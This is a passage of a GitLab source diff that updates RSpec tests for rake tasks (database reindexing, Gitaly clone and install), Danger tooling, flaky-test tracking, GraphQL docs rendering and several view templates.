index creation is enabled' do - it 'executes async index creation prior to any reindexing actions' do - stub_feature_flags(database_async_index_creation: true) - - expect(Gitlab::Database::AsyncIndexes).to receive(:create_pending_indexes!).ordered.exactly(databases_count).times - expect(Gitlab::Database::Reindexing).to 
receive(:automatic_reindexing).ordered.exactly(databases_count).times + context 'when reindexing is not enabled' do + it 'is a no-op' do + expect(Gitlab::Database::Reindexing).to receive(:enabled?).and_return(false) + expect(Gitlab::Database::Reindexing).not_to receive(:invoke) run_rake_task('gitlab:db:reindex') end end + end - context 'when async index creation is disabled' do - it 'does not execute async index creation' do - stub_feature_flags(database_async_index_creation: false) - - expect(Gitlab::Database::AsyncIndexes).not_to receive(:create_pending_indexes!) + databases = ActiveRecord::Tasks::DatabaseTasks.setup_initial_database_yaml + ActiveRecord::Tasks::DatabaseTasks.for_each(databases) do |database_name| + describe "reindex:#{database_name}" do + it 'delegates to Gitlab::Database::Reindexing' do + expect(Gitlab::Database::Reindexing).to receive(:invoke).with(database_name) - run_rake_task('gitlab:db:reindex') + run_rake_task("gitlab:db:reindex:#{database_name}") end - end - context 'calls automatic reindexing' do - it 'uses all candidate indexes' do - expect(Gitlab::Database::Reindexing).to receive(:automatic_reindexing).exactly(databases_count).times + context 'when reindexing is not enabled' do + it 'is a no-op' do + expect(Gitlab::Database::Reindexing).to receive(:enabled?).and_return(false) + expect(Gitlab::Database::Reindexing).not_to receive(:invoke).with(database_name) - run_rake_task('gitlab:db:reindex') + run_rake_task("gitlab:db:reindex:#{database_name}") + end end end end @@ -328,6 +327,32 @@ RSpec.describe 'gitlab:db namespace rake task', :silence_stdout do end end + context 'with multiple databases', :reestablished_active_record_base do + before do + allow(ActiveRecord::Tasks::DatabaseTasks).to receive(:setup_initial_database_yaml).and_return([:main, :geo]) + end + + describe 'db:structure:dump' do + it 'invokes gitlab:db:clean_structure_sql' do + skip unless Gitlab.ee? 
+ + expect(Rake::Task['gitlab:db:clean_structure_sql']).to receive(:invoke).twice.and_return(true) + + expect { run_rake_task('db:structure:dump:main') }.not_to raise_error + end + end + + describe 'db:schema:dump' do + it 'invokes gitlab:db:clean_structure_sql' do + skip unless Gitlab.ee? + + expect(Rake::Task['gitlab:db:clean_structure_sql']).to receive(:invoke).once.and_return(true) + + expect { run_rake_task('db:schema:dump:main') }.not_to raise_error + end + end + end + def run_rake_task(task_name, arguments = '') Rake::Task[task_name].reenable Rake.application.invoke_task("#{task_name}#{arguments}") diff --git a/spec/tasks/gitlab/gitaly_rake_spec.rb b/spec/tasks/gitlab/gitaly_rake_spec.rb index c5625db922d..70c7ddb1d6e 100644 --- a/spec/tasks/gitlab/gitaly_rake_spec.rb +++ b/spec/tasks/gitlab/gitaly_rake_spec.rb @@ -7,26 +7,26 @@ RSpec.describe 'gitlab:gitaly namespace rake task', :silence_stdout do Rake.application.rake_require 'tasks/gitlab/gitaly' end - describe 'install' do - let(:repo) { 'https://gitlab.com/gitlab-org/gitaly.git' } - let(:clone_path) { Rails.root.join('tmp/tests/gitaly').to_s } - let(:storage_path) { Rails.root.join('tmp/tests/repositories').to_s } - let(:version) { File.read(Rails.root.join(Gitlab::GitalyClient::SERVER_VERSION_FILE)).chomp } + let(:repo) { 'https://gitlab.com/gitlab-org/gitaly.git' } + let(:clone_path) { Rails.root.join('tmp/tests/gitaly').to_s } + let(:storage_path) { Rails.root.join('tmp/tests/repositories').to_s } + let(:version) { File.read(Rails.root.join(Gitlab::GitalyClient::SERVER_VERSION_FILE)).chomp } - subject { run_rake_task('gitlab:gitaly:install', clone_path, storage_path) } + describe 'clone' do + subject { run_rake_task('gitlab:gitaly:clone', clone_path, storage_path) } context 'no dir given' do it 'aborts and display a help message' do # avoid writing task output to spec progress allow($stderr).to receive :write - expect { run_rake_task('gitlab:gitaly:install') }.to raise_error /Please specify the 
directory where you want to install gitaly and the path for the default storage/ + expect { run_rake_task('gitlab:gitaly:clone') }.to raise_error /Please specify the directory where you want to install gitaly and the path for the default storage/ end end context 'no storage path given' do it 'aborts and display a help message' do allow($stderr).to receive :write - expect { run_rake_task('gitlab:gitaly:install', clone_path) }.to raise_error /Please specify the directory where you want to install gitaly and the path for the default storage/ + expect { run_rake_task('gitlab:gitaly:clone', clone_path) }.to raise_error /Please specify the directory where you want to install gitaly and the path for the default storage/ end end @@ -40,11 +40,6 @@ RSpec.describe 'gitlab:gitaly namespace rake task', :silence_stdout do end describe 'checkout or clone' do - before do - stub_env('CI', false) - expect(Dir).to receive(:chdir).with(clone_path) - end - it 'calls checkout_or_clone_version with the right arguments' do expect(main_object) .to receive(:checkout_or_clone_version).with(version: version, repo: repo, target_dir: clone_path, clone_opts: %w[--depth 1]) @@ -52,6 +47,10 @@ RSpec.describe 'gitlab:gitaly namespace rake task', :silence_stdout do subject end end + end + + describe 'install' do + subject { run_rake_task('gitlab:gitaly:install', clone_path, storage_path) } describe 'gmake/make' do before do @@ -62,10 +61,6 @@ RSpec.describe 'gitlab:gitaly namespace rake task', :silence_stdout do end context 'gmake is available' do - before do - expect(main_object).to receive(:checkout_or_clone_version) - end - it 'calls gmake in the gitaly directory' do expect(Gitlab::Popen).to receive(:popen) .with(%w[which gmake]) @@ -93,7 +88,6 @@ RSpec.describe 'gitlab:gitaly namespace rake task', :silence_stdout do context 'gmake is not available' do before do - expect(main_object).to receive(:checkout_or_clone_version) expect(Gitlab::Popen).to receive(:popen) .with(%w[which gmake]) 
.and_return(['', 42]) diff --git a/spec/tasks/gitlab/task_helpers_spec.rb b/spec/tasks/gitlab/task_helpers_spec.rb index 2921913319b..0c43dd15e8c 100644 --- a/spec/tasks/gitlab/task_helpers_spec.rb +++ b/spec/tasks/gitlab/task_helpers_spec.rb @@ -72,6 +72,8 @@ RSpec.describe Gitlab::TaskHelpers do describe '#checkout_version' do it 'clones the repo in the target dir' do expect(subject) + .to receive(:run_command!).with(%W[#{Gitlab.config.git.bin_path} -C #{clone_path} config protocol.version 2]) + expect(subject) .to receive(:run_command!).with(%W[#{Gitlab.config.git.bin_path} -C #{clone_path} fetch --quiet origin #{tag}]) expect(subject) .to receive(:run_command!).with(%W[#{Gitlab.config.git.bin_path} -C #{clone_path} checkout -f --quiet FETCH_HEAD --]) diff --git a/spec/tooling/danger/product_intelligence_spec.rb b/spec/tooling/danger/product_intelligence_spec.rb index c090dbb4de4..d0d4b8d4df4 100644 --- a/spec/tooling/danger/product_intelligence_spec.rb +++ b/spec/tooling/danger/product_intelligence_spec.rb @@ -65,13 +65,25 @@ RSpec.describe Tooling::Danger::ProductIntelligence do it { is_expected.to be_empty } end end + end + + describe '#skip_review' do + subject { product_intelligence.skip_review? 
} context 'with growth experiment label' do before do allow(fake_helper).to receive(:mr_has_labels?).with('growth experiment').and_return(true) end - it { is_expected.to be_empty } + it { is_expected.to be true } + end + + context 'without growth experiment label' do + before do + allow(fake_helper).to receive(:mr_has_labels?).with('growth experiment').and_return(false) + end + + it { is_expected.to be false } end end end diff --git a/spec/tooling/danger/project_helper_spec.rb b/spec/tooling/danger/project_helper_spec.rb index ec475df6d83..f13083bdf0a 100644 --- a/spec/tooling/danger/project_helper_spec.rb +++ b/spec/tooling/danger/project_helper_spec.rb @@ -3,7 +3,7 @@ require 'rspec-parameterized' require 'gitlab-dangerfiles' require 'danger' -require 'danger/plugins/helper' +require 'danger/plugins/internal/helper' require 'gitlab/dangerfiles/spec_helper' require_relative '../../../danger/plugins/project_helper' @@ -20,22 +20,7 @@ RSpec.describe Tooling::Danger::ProjectHelper do before do allow(project_helper).to receive(:helper).and_return(fake_helper) - end - - describe '#changes' do - it 'returns an array of Change objects' do - expect(project_helper.changes).to all(be_an(Gitlab::Dangerfiles::Change)) - end - - it 'groups changes by change type' do - changes = project_helper.changes - - expect(changes.added.files).to eq(added_files) - expect(changes.modified.files).to eq(modified_files) - expect(changes.deleted.files).to eq(deleted_files) - expect(changes.renamed_before.files).to eq([renamed_before_file]) - expect(changes.renamed_after.files).to eq([renamed_after_file]) - end + allow(fake_helper).to receive(:config).and_return(double(files_to_category: described_class::CATEGORIES)) end describe '#categories_for_file' do @@ -86,7 +71,7 @@ RSpec.describe Tooling::Danger::ProjectHelper do 'rubocop/foo' | [:backend] '.rubocop.yml' | [:backend] '.rubocop_todo.yml' | [:backend] - '.rubocop_manual_todo.yml' | [:backend] + '.rubocop_todo/cop/name.yml' | [:backend] 
'spec/foo' | [:backend] 'spec/foo/bar' | [:backend] @@ -192,6 +177,7 @@ RSpec.describe Tooling::Danger::ProjectHelper do 'spec/frontend/tracking_spec.js' | [:frontend, :product_intelligence] 'lib/gitlab/usage_database/foo.rb' | [:backend] 'config/metrics/counts_7d/test_metric.yml' | [:product_intelligence] + 'config/events/snowplow_event.yml' | [:product_intelligence] 'config/metrics/schema.json' | [:product_intelligence] 'doc/api/usage_data.md' | [:product_intelligence] 'spec/lib/gitlab/usage_data_spec.rb' | [:product_intelligence] @@ -246,7 +232,7 @@ RSpec.describe Tooling::Danger::ProjectHelper do end with_them do - subject { project_helper.categories_for_file(path) } + subject { project_helper.helper.categories_for_file(path) } it { is_expected.to eq(expected_categories) } end @@ -274,7 +260,7 @@ RSpec.describe Tooling::Danger::ProjectHelper do changed_files.each do |file| allow(fake_git).to receive(:diff_for_file).with(file) { double(:diff, patch: patch) } - expect(project_helper.categories_for_file(file)).to eq(expected_categories) + expect(project_helper.helper.categories_for_file(file)).to eq(expected_categories) end end end @@ -283,7 +269,7 @@ RSpec.describe Tooling::Danger::ProjectHelper do describe '.local_warning_message' do it 'returns an informational message with rules that can run' do - expect(described_class.local_warning_message).to eq('==> Only the following Danger rules can be run locally: changelog, database, documentation, duplicate_yarn_dependencies, eslint, gitaly, pajamas, pipeline, prettier, product_intelligence, utility_css, vue_shared_documentation') + expect(described_class.local_warning_message).to eq('==> Only the following Danger rules can be run locally: changelog, ci_config, database, documentation, duplicate_yarn_dependencies, eslint, gitaly, pajamas, pipeline, prettier, product_intelligence, utility_css, vue_shared_documentation') end end @@ -320,93 +306,13 @@ RSpec.describe Tooling::Danger::ProjectHelper do it 'returns all 
changed files starting with ee/' do changes = double - expect(project_helper).to receive(:changes).and_return(changes) + expect(fake_helper).to receive(:changes).and_return(changes) expect(changes).to receive(:files).and_return(%w[fr/ee/beer.rb ee/wine.rb ee/lib/ido.rb ee.k]) is_expected.to match_array(%w[ee/wine.rb ee/lib/ido.rb]) end end - describe '#project_name' do - subject { project_helper.project_name } - - it 'returns gitlab if ee? returns true' do - expect(project_helper).to receive(:ee?) { true } - - is_expected.to eq('gitlab') - end - - it 'returns gitlab-ce if ee? returns false' do - expect(project_helper).to receive(:ee?) { false } - - is_expected.to eq('gitlab-foss') - end - end - - describe '#ee?' do - subject { project_helper.__send__(:ee?) } - - let(:ee_dir) { File.expand_path('../../../ee', __dir__) } - - context 'when ENV["CI_PROJECT_NAME"] is set' do - before do - stub_env('CI_PROJECT_NAME', ci_project_name) - end - - context 'when ENV["CI_PROJECT_NAME"] is gitlab' do - let(:ci_project_name) { 'gitlab' } - - it 'returns true' do - is_expected.to eq(true) - end - end - - context 'when ENV["CI_PROJECT_NAME"] is gitlab-ee' do - let(:ci_project_name) { 'gitlab-ee' } - - it 'returns true' do - is_expected.to eq(true) - end - end - - context 'when ENV["CI_PROJECT_NAME"] is gitlab-foss' do - let(:ci_project_name) { 'gitlab-foss' } - - it 'resolves to Dir.exist?' 
do - expected = Dir.exist?(ee_dir) - - expect(Dir).to receive(:exist?).with(ee_dir).and_call_original - - is_expected.to eq(expected) - end - end - end - - context 'when ENV["CI_PROJECT_NAME"] is absent' do - before do - stub_env('CI_PROJECT_NAME', nil) - - expect(Dir).to receive(:exist?).with(ee_dir).and_return(has_ee_dir) - end - - context 'when ee/ directory exists' do - let(:has_ee_dir) { true } - - it 'returns true' do - is_expected.to eq(true) - end - end - - context 'when ee/ directory does not exist' do - let(:has_ee_dir) { false } - - it 'returns false' do - is_expected.to eq(false) - end - end - end - end - describe '#file_lines' do let(:filename) { 'spec/foo_spec.rb' } let(:file_spy) { spy } diff --git a/spec/tooling/danger/specs_spec.rb b/spec/tooling/danger/specs_spec.rb index a5978020c9d..b2454960a7b 100644 --- a/spec/tooling/danger/specs_spec.rb +++ b/spec/tooling/danger/specs_spec.rb @@ -3,7 +3,7 @@ require 'rspec-parameterized' require 'gitlab-dangerfiles' require 'danger' -require 'danger/plugins/helper' +require 'danger/plugins/internal/helper' require 'gitlab/dangerfiles/spec_helper' require_relative '../../../tooling/danger/specs' diff --git a/spec/tooling/graphql/docs/renderer_spec.rb b/spec/tooling/graphql/docs/renderer_spec.rb index 1c9605304ff..18256fea2d6 100644 --- a/spec/tooling/graphql/docs/renderer_spec.rb +++ b/spec/tooling/graphql/docs/renderer_spec.rb @@ -438,12 +438,12 @@ RSpec.describe Tooling::Graphql::Docs::Renderer do mutation.description 'Make everything very pretty.' mutation.argument :prettiness_factor, - type: GraphQL::FLOAT_TYPE, + type: GraphQL::Types::Float, required: true, description: 'How much prettier?' 
mutation.argument :pulchritude, - type: GraphQL::FLOAT_TYPE, + type: GraphQL::Types::Float, required: false, description: 'How much prettier?', deprecated: { diff --git a/spec/tooling/quality/test_level_spec.rb b/spec/tooling/quality/test_level_spec.rb index 94fa9d682e1..8a944a473d7 100644 --- a/spec/tooling/quality/test_level_spec.rb +++ b/spec/tooling/quality/test_level_spec.rb @@ -28,7 +28,7 @@ RSpec.describe Quality::TestLevel do context 'when level is unit' do it 'returns a pattern' do expect(subject.pattern(:unit)) - .to eq("spec/{bin,channels,config,db,dependencies,elastic,elastic_integration,experiments,factories,finders,frontend,graphql,haml_lint,helpers,initializers,javascripts,lib,models,policies,presenters,rack_servers,replicators,routing,rubocop,scripts,serializers,services,sidekiq,spam,support_specs,tasks,uploaders,validators,views,workers,tooling}{,/**/}*_spec.rb") + .to eq("spec/{bin,channels,config,db,dependencies,elastic,elastic_integration,experiments,factories,finders,frontend,graphql,haml_lint,helpers,initializers,javascripts,lib,metrics_server,models,policies,presenters,rack_servers,replicators,routing,rubocop,scripts,serializers,services,sidekiq,sidekiq_cluster,spam,support_specs,tasks,uploaders,validators,views,workers,tooling}{,/**/}*_spec.rb") end end @@ -110,7 +110,7 @@ RSpec.describe Quality::TestLevel do context 'when level is unit' do it 'returns a regexp' do expect(subject.regexp(:unit)) - .to eq(%r{spec/(bin|channels|config|db|dependencies|elastic|elastic_integration|experiments|factories|finders|frontend|graphql|haml_lint|helpers|initializers|javascripts|lib|models|policies|presenters|rack_servers|replicators|routing|rubocop|scripts|serializers|services|sidekiq|spam|support_specs|tasks|uploaders|validators|views|workers|tooling)}) + .to 
eq(%r{spec/(bin|channels|config|db|dependencies|elastic|elastic_integration|experiments|factories|finders|frontend|graphql|haml_lint|helpers|initializers|javascripts|lib|metrics_server|models|policies|presenters|rack_servers|replicators|routing|rubocop|scripts|serializers|services|sidekiq|sidekiq_cluster|spam|support_specs|tasks|uploaders|validators|views|workers|tooling)}) end end diff --git a/spec/tooling/rspec_flaky/flaky_example_spec.rb b/spec/tooling/rspec_flaky/flaky_example_spec.rb index ab652662c0b..03436ee1cbd 100644 --- a/spec/tooling/rspec_flaky/flaky_example_spec.rb +++ b/spec/tooling/rspec_flaky/flaky_example_spec.rb @@ -1,7 +1,7 @@ # frozen_string_literal: true -require 'active_support/testing/time_helpers' require_relative '../../support/helpers/stub_env' +require_relative '../../support/time_travel' require_relative '../../../tooling/rspec_flaky/flaky_example' @@ -36,40 +36,39 @@ RSpec.describe RspecFlaky::FlakyExample, :aggregate_failures do } end - let(:example) { OpenStruct.new(example_attrs) } - before do # Stub these env variables otherwise specs don't behave the same on the CI - stub_env('CI_PROJECT_URL', nil) - stub_env('CI_JOB_ID', nil) + stub_env('CI_JOB_URL', nil) end - describe '#initialize' do + describe '#initialize', :freeze_time do shared_examples 'a valid FlakyExample instance' do let(:flaky_example) { described_class.new(args) } it 'returns valid attributes' do - expect(flaky_example.uid).to eq(flaky_example_attrs[:uid]) - expect(flaky_example.file).to eq(flaky_example_attrs[:file]) - expect(flaky_example.line).to eq(flaky_example_attrs[:line]) - expect(flaky_example.description).to eq(flaky_example_attrs[:description]) - expect(flaky_example.first_flaky_at).to eq(expected_first_flaky_at) - expect(flaky_example.last_flaky_at).to eq(expected_last_flaky_at) - expect(flaky_example.last_attempts_count).to eq(flaky_example_attrs[:last_attempts_count]) - expect(flaky_example.flaky_reports).to eq(expected_flaky_reports) + attrs = 
flaky_example.to_h + + expect(attrs[:uid]).to eq(flaky_example_attrs[:uid]) + expect(attrs[:file]).to eq(flaky_example_attrs[:file]) + expect(attrs[:line]).to eq(flaky_example_attrs[:line]) + expect(attrs[:description]).to eq(flaky_example_attrs[:description]) + expect(attrs[:first_flaky_at]).to eq(expected_first_flaky_at) + expect(attrs[:last_flaky_at]).to eq(expected_last_flaky_at) + expect(attrs[:last_attempts_count]).to eq(flaky_example_attrs[:last_attempts_count]) + expect(attrs[:flaky_reports]).to eq(expected_flaky_reports) end end - context 'when given an Rspec::Example' do + context 'when given an Example hash' do it_behaves_like 'a valid FlakyExample instance' do - let(:args) { example } - let(:expected_first_flaky_at) { nil } - let(:expected_last_flaky_at) { nil } + let(:args) { example_attrs } + let(:expected_first_flaky_at) { Time.now } + let(:expected_last_flaky_at) { Time.now } let(:expected_flaky_reports) { 0 } end end - context 'when given a hash' do + context 'when given a FlakyExample hash' do it_behaves_like 'a valid FlakyExample instance' do let(:args) { flaky_example_attrs } let(:expected_flaky_reports) { flaky_example_attrs[:flaky_reports] } @@ -89,17 +88,17 @@ RSpec.describe RspecFlaky::FlakyExample, :aggregate_failures do freeze_time do flaky_example.update_flakiness! - expect(flaky_example.first_flaky_at).to eq(Time.now) + expect(flaky_example.to_h[:first_flaky_at]).to eq(Time.now) end end it 'maintains the first_flaky_at if exists' do flaky_example.update_flakiness! - expected_first_flaky_at = flaky_example.first_flaky_at + expected_first_flaky_at = flaky_example.to_h[:first_flaky_at] travel_to(Time.now + 42) do flaky_example.update_flakiness! - expect(flaky_example.first_flaky_at).to eq(expected_first_flaky_at) + expect(flaky_example.to_h[:first_flaky_at]).to eq(expected_first_flaky_at) end end @@ -108,53 +107,54 @@ RSpec.describe RspecFlaky::FlakyExample, :aggregate_failures do the_future = Time.now flaky_example.update_flakiness! 
- expect(flaky_example.last_flaky_at).to eq(the_future) + expect(flaky_example.to_h[:last_flaky_at]).to eq(the_future) end end it 'updates the flaky_reports' do - expected_flaky_reports = flaky_example.first_flaky_at ? flaky_example.flaky_reports + 1 : 1 + expected_flaky_reports = flaky_example.to_h[:first_flaky_at] ? flaky_example.to_h[:flaky_reports] + 1 : 1 - expect { flaky_example.update_flakiness! }.to change { flaky_example.flaky_reports }.by(1) - expect(flaky_example.flaky_reports).to eq(expected_flaky_reports) + expect { flaky_example.update_flakiness! }.to change { flaky_example.to_h[:flaky_reports] }.by(1) + expect(flaky_example.to_h[:flaky_reports]).to eq(expected_flaky_reports) end context 'when passed a :last_attempts_count' do it 'updates the last_attempts_count' do flaky_example.update_flakiness!(last_attempts_count: 42) - expect(flaky_example.last_attempts_count).to eq(42) + expect(flaky_example.to_h[:last_attempts_count]).to eq(42) end end context 'when run on the CI' do + let(:job_url) { 'https://gitlab.com/gitlab-org/gitlab-foss/-/jobs/42' } + before do - stub_env('CI_PROJECT_URL', 'https://gitlab.com/gitlab-org/gitlab-foss') - stub_env('CI_JOB_ID', 42) + stub_env('CI_JOB_URL', job_url) end it 'updates the last_flaky_job' do flaky_example.update_flakiness! 
- expect(flaky_example.last_flaky_job).to eq('https://gitlab.com/gitlab-org/gitlab-foss/-/jobs/42') + expect(flaky_example.to_h[:last_flaky_job]).to eq(job_url) end end end - context 'when given an Rspec::Example' do + context 'when given an Example hash' do it_behaves_like 'an up-to-date FlakyExample instance' do - let(:args) { example } + let(:args) { example_attrs } end end - context 'when given a hash' do + context 'when given a FlakyExample hash' do it_behaves_like 'an up-to-date FlakyExample instance' do let(:args) { flaky_example_attrs } end end end - describe '#to_h' do + describe '#to_h', :freeze_time do shared_examples 'a valid FlakyExample hash' do let(:additional_attrs) { {} } @@ -166,17 +166,17 @@ RSpec.describe RspecFlaky::FlakyExample, :aggregate_failures do end end - context 'when given an Rspec::Example' do - let(:args) { example } + context 'when given an Example hash' do + let(:args) { example_attrs } it_behaves_like 'a valid FlakyExample hash' do let(:additional_attrs) do - { first_flaky_at: nil, last_flaky_at: nil, last_flaky_job: nil, flaky_reports: 0 } + { first_flaky_at: Time.now, last_flaky_at: Time.now, last_flaky_job: nil, flaky_reports: 0 } end end end - context 'when given a hash' do + context 'when given a FlakyExample hash' do let(:args) { flaky_example_attrs } it_behaves_like 'a valid FlakyExample hash' diff --git a/spec/tooling/rspec_flaky/flaky_examples_collection_spec.rb b/spec/tooling/rspec_flaky/flaky_examples_collection_spec.rb index 823459e31b4..e5f985c9596 100644 --- a/spec/tooling/rspec_flaky/flaky_examples_collection_spec.rb +++ b/spec/tooling/rspec_flaky/flaky_examples_collection_spec.rb @@ -1,8 +1,10 @@ # frozen_string_literal: true +require_relative '../../support/time_travel' + require_relative '../../../tooling/rspec_flaky/flaky_examples_collection' -RSpec.describe RspecFlaky::FlakyExamplesCollection, :aggregate_failures do +RSpec.describe RspecFlaky::FlakyExamplesCollection, :aggregate_failures, :freeze_time do 
let(:collection_hash) do { a: { example_id: 'spec/foo/bar_spec.rb:2' }, @@ -14,15 +16,19 @@ RSpec.describe RspecFlaky::FlakyExamplesCollection, :aggregate_failures do { a: { example_id: 'spec/foo/bar_spec.rb:2', - first_flaky_at: nil, - last_flaky_at: nil, - last_flaky_job: nil + first_flaky_at: Time.now, + last_flaky_at: Time.now, + last_flaky_job: nil, + flaky_reports: 0, + last_attempts_count: nil }, b: { example_id: 'spec/foo/baz_spec.rb:3', - first_flaky_at: nil, - last_flaky_at: nil, - last_flaky_job: nil + first_flaky_at: Time.now, + last_flaky_at: Time.now, + last_flaky_job: nil, + flaky_reports: 0, + last_attempts_count: nil } } end @@ -59,9 +65,11 @@ RSpec.describe RspecFlaky::FlakyExamplesCollection, :aggregate_failures do expect((collection2 - collection1).to_h).to eq( c: { example_id: 'spec/bar/baz_spec.rb:4', - first_flaky_at: nil, - last_flaky_at: nil, - last_flaky_job: nil + first_flaky_at: Time.now, + last_flaky_at: Time.now, + last_flaky_job: nil, + flaky_reports: 0, + last_attempts_count: nil }) end diff --git a/spec/tooling/rspec_flaky/listener_spec.rb b/spec/tooling/rspec_flaky/listener_spec.rb index 429724a20cf..51a815dafbf 100644 --- a/spec/tooling/rspec_flaky/listener_spec.rb +++ b/spec/tooling/rspec_flaky/listener_spec.rb @@ -1,7 +1,7 @@ # frozen_string_literal: true -require 'active_support/testing/time_helpers' require_relative '../../support/helpers/stub_env' +require_relative '../../support/time_travel' require_relative '../../../tooling/rspec_flaky/listener' @@ -53,8 +53,7 @@ RSpec.describe RspecFlaky::Listener, :aggregate_failures do before do # Stub these env variables otherwise specs don't behave the same on the CI - stub_env('CI_PROJECT_URL', nil) - stub_env('CI_JOB_ID', nil) + stub_env('CI_JOB_URL', nil) stub_env('SUITE_FLAKY_RSPEC_REPORT_PATH', nil) end @@ -217,7 +216,7 @@ RSpec.describe RspecFlaky::Listener, :aggregate_failures do expect(RspecFlaky::Report).to receive(:new).with(listener.flaky_examples).and_return(report1) 
expect(report1).to receive(:write).with(RspecFlaky::Config.flaky_examples_report_path) - expect(RspecFlaky::Report).to receive(:new).with(listener.flaky_examples - listener.suite_flaky_examples).and_return(report2) + expect(RspecFlaky::Report).to receive(:new).with(listener.__send__(:new_flaky_examples)).and_return(report2) expect(report2).to receive(:write).with(RspecFlaky::Config.new_flaky_examples_report_path) listener.dump_summary(nil) diff --git a/spec/tooling/rspec_flaky/report_spec.rb b/spec/tooling/rspec_flaky/report_spec.rb index 6c364cd5cd3..ffd0cd987aa 100644 --- a/spec/tooling/rspec_flaky/report_spec.rb +++ b/spec/tooling/rspec_flaky/report_spec.rb @@ -2,9 +2,11 @@ require 'tempfile' +require_relative '../../support/time_travel' + require_relative '../../../tooling/rspec_flaky/report' -RSpec.describe RspecFlaky::Report, :aggregate_failures do +RSpec.describe RspecFlaky::Report, :aggregate_failures, :freeze_time do let(:thirty_one_days) { 3600 * 24 * 31 } let(:collection_hash) do { diff --git a/spec/views/admin/application_settings/_package_registry.html.haml_spec.rb b/spec/views/admin/application_settings/_package_registry.html.haml_spec.rb index 72e32643a49..18a2e29adab 100644 --- a/spec/views/admin/application_settings/_package_registry.html.haml_spec.rb +++ b/spec/views/admin/application_settings/_package_registry.html.haml_spec.rb @@ -28,6 +28,9 @@ RSpec.describe 'admin/application_settings/_package_registry' do expect(rendered).to have_field('Maximum Conan package file size in bytes', type: 'number') expect(page.find_field('Maximum Conan package file size in bytes').value).to eq(default_plan_limits.conan_max_file_size.to_s) + expect(rendered).to have_field('Maximum Helm chart file size in bytes', type: 'number') + expect(page.find_field('Maximum Helm chart file size in bytes').value).to eq(default_plan_limits.helm_max_file_size.to_s) + expect(rendered).to have_field('Maximum Maven package file size in bytes', type: 'number') 
expect(page.find_field('Maximum Maven package file size in bytes').value).to eq(default_plan_limits.maven_max_file_size.to_s) diff --git a/spec/views/groups/new.html.haml_spec.rb b/spec/views/groups/new.html.haml_spec.rb new file mode 100644 index 00000000000..8b12cc42a88 --- /dev/null +++ b/spec/views/groups/new.html.haml_spec.rb @@ -0,0 +1,28 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe 'groups/new.html.haml' do + let_it_be(:user) { create(:user) } + let_it_be(:group) { build(:group, namespace_settings: build(:namespace_settings)) } + + before do + assign(:group, group) + assign(:current_user, user) + + allow(view).to receive(:current_user).and_return(user) + allow(view).to receive(:captcha_required?).and_return(false) + allow(view).to receive(:import_sources_enabled?).and_return(false) + + render + end + + describe 'setup_for_company field' do + it 'does not have a default selection', :aggregate_failures do + expect(rendered).to have_field('My company or team') + expect(rendered).not_to have_checked_field('My company or team') + expect(rendered).to have_field('Just me') + expect(rendered).not_to have_checked_field('Just me') + end + end +end diff --git a/spec/views/groups/runners/_group_runners.html.haml_spec.rb b/spec/views/groups/runners/_group_runners.html.haml_spec.rb index 0d47409c658..3a8686ab046 100644 --- a/spec/views/groups/runners/_group_runners.html.haml_spec.rb +++ b/spec/views/groups/runners/_group_runners.html.haml_spec.rb @@ -11,12 +11,11 @@ RSpec.describe 'groups/runners/group_runners.html.haml' do @group = group allow(view).to receive(:current_user).and_return(user) allow(view).to receive(:reset_registration_token_group_settings_ci_cd_path).and_return('banana_url') - allow(view).to receive(:can?).with(user, :admin_pipeline, group).and_return(true) end context 'when group runner registration is allowed' do before do - stub_application_setting(valid_runner_registrars: ['group']) + allow(view).to 
receive(:can?).with(user, :register_group_runners, group).and_return(true) end it 'enables the Remove group button for a group' do @@ -29,7 +28,7 @@ RSpec.describe 'groups/runners/group_runners.html.haml' do context 'when group runner registration is not allowed' do before do - stub_application_setting(valid_runner_registrars: ['project']) + allow(view).to receive(:can?).with(user, :register_group_runners, group).and_return(false) end it 'does not enable the the Remove group button for a group' do diff --git a/spec/views/jira_connect/subscriptions/index.html.haml_spec.rb b/spec/views/jira_connect/subscriptions/index.html.haml_spec.rb deleted file mode 100644 index 0a4d283a983..00000000000 --- a/spec/views/jira_connect/subscriptions/index.html.haml_spec.rb +++ /dev/null @@ -1,30 +0,0 @@ -# frozen_string_literal: true - -require 'spec_helper' - -RSpec.describe 'jira_connect/subscriptions/index.html.haml' do - let(:user) { build_stubbed(:user) } - - before do - allow(view).to receive(:current_user).and_return(user) - assign(:subscriptions, create_list(:jira_connect_subscription, 1)) - end - - context 'when the user is signed in' do - it 'shows link to user profile' do - render - - expect(rendered).to have_link(user.to_reference) - end - end - - context 'when the user is not signed in' do - let(:user) { nil } - - it 'shows "Sign in" link' do - render - - expect(rendered).to have_link('Sign in to GitLab') - end - end -end diff --git a/spec/views/layouts/_head.html.haml_spec.rb b/spec/views/layouts/_head.html.haml_spec.rb index 2c7289deaef..f9725c73d05 100644 --- a/spec/views/layouts/_head.html.haml_spec.rb +++ b/spec/views/layouts/_head.html.haml_spec.rb @@ -62,7 +62,7 @@ RSpec.describe 'layouts/_head' do expect(rendered).to match('<link rel="stylesheet" media="print" href="/stylesheets/highlight/themes/solarised-light.css" />') end - context 'when an asset_host is set and snowplow url is set' do + context 'when an asset_host is set and snowplow url is set', quarantine: 
'https://gitlab.com/gitlab-org/gitlab/-/issues/346542' do let(:asset_host) { 'http://test.host' } let(:snowplow_collector_hostname) { 'www.snow.plow' } diff --git a/spec/views/layouts/header/_new_dropdown.haml_spec.rb b/spec/views/layouts/header/_new_dropdown.haml_spec.rb index 47abfff87bb..208da345e7f 100644 --- a/spec/views/layouts/header/_new_dropdown.haml_spec.rb +++ b/spec/views/layouts/header/_new_dropdown.haml_spec.rb @@ -6,33 +6,13 @@ RSpec.describe 'layouts/header/_new_dropdown' do let_it_be(:user) { create(:user) } shared_examples_for 'invite member quick link' do - context 'when an experiment is active' do - before do - allow(Gitlab::Experimentation).to receive(:active?).and_return(true) - allow(view).to receive(:experiment_tracking_category_and_group) - allow(view).to receive(:tracking_label) - end - - context 'with ability to invite members' do - it { is_expected.to have_link('Invite members', href: href) } - - it 'records the experiment' do - subject - - expect(view).to have_received(:experiment_tracking_category_and_group) - .with(:invite_members_new_dropdown) - expect(view).to have_received(:tracking_label) - end - end - - context 'without ability to invite members' do - let(:invite_member) { false } - - it { is_expected.not_to have_link('Invite members') } - end + context 'with ability to invite members' do + it { is_expected.to have_link('Invite members', href: href) } end - context 'when experiment is not active' do + context 'without ability to invite members' do + let(:invite_member) { false } + it { is_expected.not_to have_link('Invite members') } end end @@ -72,7 +52,6 @@ RSpec.describe 